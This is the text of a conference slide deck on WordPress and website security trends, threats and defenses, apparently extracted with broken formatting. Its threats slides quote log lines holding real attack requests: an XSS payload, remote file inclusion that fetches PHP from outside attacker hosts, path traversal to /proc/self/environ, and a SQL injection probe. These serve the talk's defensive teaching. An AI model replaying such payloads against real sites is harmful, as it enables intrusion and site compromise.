Post on 23-Aug-2014
description
It’s About the Basics Website Security (WordPress
04/07/2023
# WHOIS PEREZBOX Organization
Sucuri, Inc. Co-Founder Chief Operating Officer @sucuri_security @perezbox
Specialization: Website Security Incident Handling Log Analysis
Special Interests: Working Out Brazilian JiuJitsu
Tony Perez | @perezbox | @sucuri_security 2
04/07/2023
Website Security Company
Global Operations
Platform Agnostic (i.e., Joomla, WordPress, etc..)
Scan 2M Unique Domains a Month
Block 4M web attacks a Month
Remediate 400 – 500 websites a day
Signature / Heuristic Based
24/7 operations
Tony Perez | @perezbox | @sucuri_security 3
04/07/2023
Today’s Discussion
Trends Threats Defenses
Tony Perez | @perezbox | @sucuri_security 4
SIMPLE RIGHT?
04/07/2023
Trends
Tony Perez | @perezbox | @sucuri_security 5
04/07/2023
2013 – Year of the Mega Breach
Tony Perez | @perezbox | @sucuri_security 6
Data Breaches (Millions)
2011 2013
~230%
04/07/2023
Anatomy of Malicious Websites
Malicious WebsitesLegitimate Websites
Tony Perez | @perezbox | @sucuri_security 7
85%
04/07/2023
Legitimate Websites
Not-ExploitableExploitable
77%
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 8
1 in 8 - Critical Vulnerability
04/07/2023
Malware Distribution
Remot
e iFr
ame I
ncludes
Remot
e Jav
aScri
pt Inclu
des
SPAM Injec
tions
Obfusc
ated
/ En
coded
Java
Script
Conditi
onal
Redire
cts
Deface
ments
Other
26%
19%16% 14%
11%
4%
10%
Tony Perez | @perezbox | @sucuri_security 10
04/07/2023
Malicious Links
Tony Perez | @perezbox | @sucuri_security 11
Malicious
Links
Social Media
Email Links Website
Text Messag
es
04/07/2023
Spear Phishing / Phishing Increase
Tony Perez | @perezbox | @sucuri_security 12
93% Increase in 2013
04/07/2023
Beyond The Application Layer
Tony Perez | @perezbox | @sucuri_security 13
Darkleech
Cdork (Apache
)
Ebury (SSH)
Email Server (SPAM)
Going Deeper than the application layer, targeting the server.
Server Polymorphism – a.k.a highly adaptive / sophistication
Heartbleed
(OpenSSL)
04/07/2023
HeartBleed
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 14
04/07/2023
Search Engine Poisoning (SEP) Pharmacy Payday Loans
Tony Perez | @perezbox | @sucuri_security 16
04/07/2023
Automated Attacks
WP-ADMIN
Themes /
PluginsPayloa
d
Tony Perez | @perezbox | @sucuri_security 17
Exploiting Access Control
04/07/2023
Soup Kitchen Servers
Tony Perez | @perezbox | @sucuri_security 18
Site 1
Site 2Site 3
Site 4
Cross-Site Contamination
04/07/2023
Drive By Downloads
Tony Perez | @perezbox | @sucuri_security 19
04/07/2023
Targeting Zero Days
Tony Perez | @perezbox | @sucuri_security 20
04/07/2023
Targeting Mobile Devices
Tony Perez | @perezbox | @sucuri_security 21
04/07/2023
Google is On Fire
Tony Perez | @perezbox | @sucuri_security 22
04/07/2023
Brute Force Attacks
Tony Perez | @perezbox | @sucuri_security 23
04/07/2023
Denial of Service (DOS)
Tony Perez | @perezbox | @sucuri_security 24
04/07/2023
Brute Force vs Denial of Service
Tony Perez | @perezbox | @sucuri_security 25
04/07/2023
Exploiting Trust
Tony Perez | @perezbox | @sucuri_security 26
04/07/2023
There’s a Tool for that Explosion in the Malware
as a Service (MaaS) trade Yes, pay someone to hack
for you
Different tools to break in and generate payloads Brute force and
vulnerability exploits Malware Payloads
Blackhole Exploit Author Arrested
Tony Perez | @perezbox | @sucuri_security 27
04/07/2023
Exploit kit Market in Flux
25%
22%
9%1%10%
5%
11%
10%5% Neutrino
Unknown KitRedkitSweetOrangeStyxGlazunov/SibhostNuclearBlackhole/CoolOther
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 28
04/07/2023
Don’t Worry, Everyone is a “Target”
Tony Perez | @perezbox | @sucuri_security 29
04/07/2023
Threats
Tony Perez | @perezbox | @sucuri_security 30
04/07/2023
Anatomy of Web Attacks
Recon Identify Attack Decisions Sustain
Tony Perez | @perezbox | @sucuri_security 31
Use for malware? Burrow into network? Steal data?
What kind of website do you have?
04/07/2023
Five Stages of an Attack
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 32
04/07/2023
Cross-Site Scripting (XSS)
Tony Perez | @perezbox | @sucuri_security 33
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
Stored Reflective
04/07/2023
iFrame Injections
Tony Perez | @perezbox | @sucuri_security 34
04/07/2023
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0”
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6”
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
Remote / Local File Inclusion (RFI)
Tony Perez | @perezbox | @sucuri_security 35
04/07/2023
SQL Injection
Tony Perez | @perezbox | @sucuri_security 36
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”
04/07/2023
Spear Phishing
Tony Perez | @perezbox | @sucuri_security 37
04/07/2023
Backdoors
Tony Perez | @perezbox | @sucuri_security 38
04/07/2023
Free is not always Free http://blog.sucuri.net/2014/03/unmasking-free-pr
emium-wordpress-plugins.html
Tony Perez | @perezbox | @sucuri_security 39
- SEOPresser- Payload located: wp-content/plugins/seo-pressor(gratuit)- File: central.class.php
- Flat Skins Pack Extension- Payload located: wp-content/restrict-content-pro/includes/- File: sidebar.php
- Restrict Content Pro- Paylaod located: wp-content/ubermenu-skins-flat
04/07/2023
What’s all this mean?
Brand Reputation Legal Implications Impact to Sales Blacklisted by
Search Engines Blacklisted by
Payment processors Worst Day Of your
Life
Tony Perez | @perezbox | @sucuri_security 40
04/07/2023
Defenses
Tony Perez | @perezbox | @sucuri_security 41
04/07/2023
Our Insight Come From
Sucuri properties suffer: ~125,000 web based
attacks a month on average
~4,000 attacks a day▪ This spikes on occasion
Doesn’t include server level attacks
All flavors of attacks
Tony Perez | @perezbox | @sucuri_security 42
04/07/2023
Areas to Focus On
Principles Access Control Vulnerabilities
Tony Perez | @perezbox | @sucuri_security 43
04/07/2023
Manage your expectations
“It’s about risk reduction… risk will never be zero…”
Tony Perez | @perezbox | @sucuri_security 44
04/07/2023
Defense in Depth
“…a concept in which multiple layers of security controls (defenses) are placed throughout an information
technology (IT) system. Its intent is to provide redundancy in the event a
security control fails or a vulnerability is exploited…”
Tony Perez | @perezbox | @sucuri_security 45
04/07/2023
Access
Passwords
Tony Perez | @perezbox | @sucuri_security 46
Complex – Long - Unique
04/07/2023
Principle of Least Privileged
“requires that in a particular abstraction layer of a computing
environment, every module (such as a process, a user or a program
depending on the subject) must be able to access only the information
and resources that are necessary for its legitimate purpose.”
Tony Perez | @perezbox | @sucuri_security 47
04/07/2023
Disable PHP Execution
Tony Perez | @perezbox | @sucuri_security 48
PHP Execution, disable it:
/wp-includes /wp-content /themes /plugins /uploads
<Files *.php>Deny from all</Files>
04/07/2023
Disable Plugin / Theme Editor WP-CONFIG File Modification
#Disable Plugin / Theme EditorDefine(‘DISALLOW_FILE_EDIT’,true);
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 49
04/07/2023
Please Backup
Tony Perez | @perezbox | @sucuri_security 50
04/07/2023
Stay Current (Update)
Tony Perez | @perezbox | @sucuri_security 51
NOT THAT HARD!!!!
04/07/2023
Software Vulnerabilities
Tony Perez | @perezbox | @sucuri_security 52
04/07/2023
Biggest Weakness / Vulnerability
Tony Perez | @perezbox | @sucuri_security 53
04/07/2023
Simple Steps to Risk Reduction
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 54
1. Employ Website Firewall
2. Don’t let WordPress write to itself
3. Filter Access by IP 4. Use a dedicated
server / VPS5. Monitor all Activity
(Logging)6. Enable SSL for
transactions7. Keep environment
current (patched)8. No Soup Kitchen
Servers
Ideal implementations:
1. Connect Securely – SFTP / SSH
2. Authentication Keys / wp-config
3. Use Trusted Sources4. Use a local Antivirus – MAC
too5. Permissions - D 755 | F 6446. Least Privileged Principles7. Accountability8. Backups – Include Database
The Bare Minimum:
04/07/2023
10 Stupid Mindsets / Actions1. Fix index.php file and assume all is fine.
2. Panic your way into WordPress Forums after hack.
3. Don’t worry about updating.
4. Trust third-party extensions.
5. Apply all upgrades on live site.
6. Install and forget, all is well with your new site.
7. Use the same username and password for everything.
8. Don’t waste time making security adjustments to PHP and settings.
9. No regular backups required.
10. Use the cheapest host.
Tony Perez | @perezbox | @sucuri_security 55
04/07/2023
Notable Resources
Tony Perez | @perezbox | @sucuri_security 56
Name Tool
Sucuri Blog http://blog.sucuri.net
Sucuri TV http://sucuri.tv
Malware Scanner http://sitecheck.sucuri.net
Malware Scanner http://unmaskparasites.com
Badware Busters https://badwarebusters.org
Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites Google Webmaster Tools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 Secunia Security Advisories http://secunia.com/community/advisories/search/?search=wordpress
Exploit-DB http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31 WordPress Hacked FAQ http://codex.wordpress.org/FAQ_My_site_was_hacked
WordPress Hardening http://codex.wordpress.org/Hardening_WordPress
04/07/2023
Questions?
Tony Perez | @perezbox | @sucuri_security 57
Sucuri, Inc.Tony Perez
http://sucuri.nethttp://blog.sucuri.net
@perezbox | @sucuri_security